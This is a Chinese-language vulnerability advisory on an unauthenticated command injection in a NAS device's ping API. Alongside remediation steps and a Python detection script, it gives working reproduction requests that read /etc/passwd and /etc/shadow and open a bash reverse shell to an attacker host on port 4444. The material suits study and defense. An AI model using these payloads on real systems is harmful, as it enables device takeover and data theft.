深圳市绿联科技股份有限公司DH2100+ NAS命令执行漏洞分析与修复指南

一、漏洞背景

随着家庭与企业级NAS（网络附加存储）设备的普及，绿联DH2100+凭借高性价比、易用性成为市场热门产品，但近期安全研究人员披露该设备特定版本存在未授权远程命令执行高危漏洞，攻击者可无需账号密码直接控制设备，窃取存储的敏感数据，引发严重安全风险。

二、漏洞概述

漏洞类型

未授权远程命令执行（Unauthenticated Remote Command Execution）

影响范围

深圳市绿联科技DH2100+ NAS设备固件版本≤v4.6.1.1472（以官方公开修复版本为准）

漏洞等级

高危（CVSS评分：9.8/10）

三、漏洞原理深度解析

绿联DH2100+ NAS的系统网络检测API接口（/api/system/ping）存在两处关键安全缺陷：

1. 无身份验证校验：该接口未对请求发起者的身份进行验证，任何局域网或公网攻击者均可直接访问接口发起请求；
2. 输入过滤不严格：接口在处理用户提交的host参数时，直接将参数拼接到系统ping命令中执行，未对分号（;）、管道符（|）、反引号（``）等命令分隔/拼接特殊字符进行过滤，导致攻击者可通过构造恶意参数，在原有ping命令后追加任意系统命令，实现命令注入。

例如，攻击者构造请求：

GET /api/system/ping?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1
Host: [目标设备IP]

设备会执行拼接后的系统命令：ping -c 3 127.0.0.1;cat /etc/passwd，从而返回设备的用户账号信息，证明命令执行成功。

四、漏洞复现完整步骤

前置条件

• 目标绿联DH2100+ NAS设备处于联网状态，且攻击者可访问设备管理端口（默认80/8080）；
• 设备固件版本在漏洞影响范围内。

复现步骤

1. 漏洞初步验证
   启动Burp Suite或浏览器开发者工具，向目标设备发送以下GET请求：

   GET /api/system/ping?host=127.0.0.1;whoami HTTP/1.1
   Host: 192.168.1.100
   User-Agent: Mozilla/5.0

   若响应内容包含root（设备默认系统用户）的输出，则证明漏洞存在。

2. 获取敏感配置信息
   构造请求读取设备密码哈希文件：

   GET /api/system/ping?host=127.0.0.1;cat%20/etc/shadow HTTP/1.1
   Host: 192.168.1.100

   响应包将返回管理员账号的密码哈希值，攻击者可通过彩虹表破解获取登录权限。

3. 获取交互式Root Shell
   攻击者本地监听端口（如nc -lvnp 4444），构造反弹Shell请求：

   GET /api/system/ping?host=127.0.0.1;bash%20-i%20%3E%26%20/dev/tcp/[攻击者IP]/4444%200%3E%261 HTTP/1.1
   Host: 192.168.1.100

   监听端将收到设备的Root权限Shell，攻击者可完全控制设备。

五、漏洞危害评估

1. 敏感数据泄露：攻击者可读取设备上存储的个人隐私文件、企业商业文档、用户账号密码等敏感信息；
2. 设备完全失控：攻击者可篡改设备配置、删除存储数据、植入恶意程序，甚至将设备作为僵尸网络节点发起DDoS攻击；
3. 内网横向渗透：若设备部署在企业内网，攻击者可利用设备作为跳板，攻击内网其他服务器、办公设备，扩大攻击范围。

六、官方修复方案与用户自救指南

1. 优先升级固件版本

绿联官方已发布漏洞修复固件，用户需立即执行以下操作：

• 登录绿联DH2100+管理后台（默认地址：http://[设备IP]:8080）；
• 进入「系统设置」-「固件更新」模块，检查并升级至最新稳定固件（推荐版本≥v4.6.1.1500）；
• 升级完成后重启设备，确保修复生效。

2. 加固设备网络访问权限

• 将NAS设备部署在内网非DMZ区域，通过路由器/防火墙规则，禁止公网直接访问设备管理端口；
• 仅允许信任的内网IP地址访问管理后台，限制不必要的网络暴露。

3. 强化身份认证安全

• 设置长度≥12位的复杂管理员密码，包含大小写字母、数字、特殊字符；
• 若设备支持，启用「双因素认证」功能，提升账号登录安全性；
• 定期更换管理员密码，避免密码泄露风险。

4. 定期安全审计

• 开启设备系统日志记录功能，定期导出日志检查是否存在异常命令执行、登录记录；
• 使用网络扫描工具（如Nessus、OpenVAS）定期检测设备漏洞状态。

七、漏洞快速检测工具（Python示例）

以下脚本可自动化检测目标设备是否存在该漏洞：

import requests
import urllib.parse

def check_greenunion_vuln(target_url):
    test_payload = "127.0.0.1;echo%20glv_vuln_verify"
    full_url = f"{target_url.rstrip('/')}/api/system/ping?host={test_payload}"
    try:
        response = requests.get(full_url, timeout=15, verify=False)
        if "glv_vuln_verify" in response.text:
            print(f"[+] 高危漏洞存在：{target_url} 符合绿联DH2100+命令执行漏洞特征")
            return True
        else:
            print(f"[-] {target_url} 未检测到漏洞或已修复")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[!] 检测失败：{str(e)}")
        return False

if __name__ == "__main__":
    target = input("请输入目标设备URL（示例：http://192.168.1.100）：")
    check_greenunion_vuln(target)